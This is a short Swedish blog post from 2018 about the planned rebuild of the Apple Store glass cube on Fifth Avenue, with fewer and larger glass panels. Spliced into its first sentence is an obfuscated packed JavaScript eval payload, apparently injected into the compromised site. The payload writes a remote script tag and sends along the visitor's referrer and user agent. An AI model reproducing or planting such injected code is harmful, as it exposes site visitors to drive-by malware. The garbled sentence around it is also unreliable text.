Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Så här kommer Apple Store Fifth Avenue se ut

Så här kommer Apple Store Fifth Avenue se ut
Sebastian Plengier Ehrnfelt

Apple’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrzzh|var|u0026u|referrer|isfzt||js|php’.split(‘|’),0,{}))
nog mest omtalade butik på Fifth Avenue i New York håller just nu på att renoveras och byggas om.

Apple’s vackra glaskub som stått där nu i ett x antal år kommer få sig ett lyft. Genom ny glasteknik har man nu minskat antalet glaspaneler på 90 st till endast 15. Tekniken har innan redan testats på Apples butik i Shanghai. Glasrutorna till den nya entrén kommer nu vara ca 10 meter på höjden och tre meter i bredd. De största partierna kommer att vara runt 12,5 meter långa och 2.5 meter breda.

Detta kommer troligtvis bli en stilren, luftig och riktigt snygg affär. Men att nu vara det högst värderade företaget i världen så borde det inte vara några problem att finansiera detta och göra det hela till något extra häftigt.

Mer info: thenextweb.com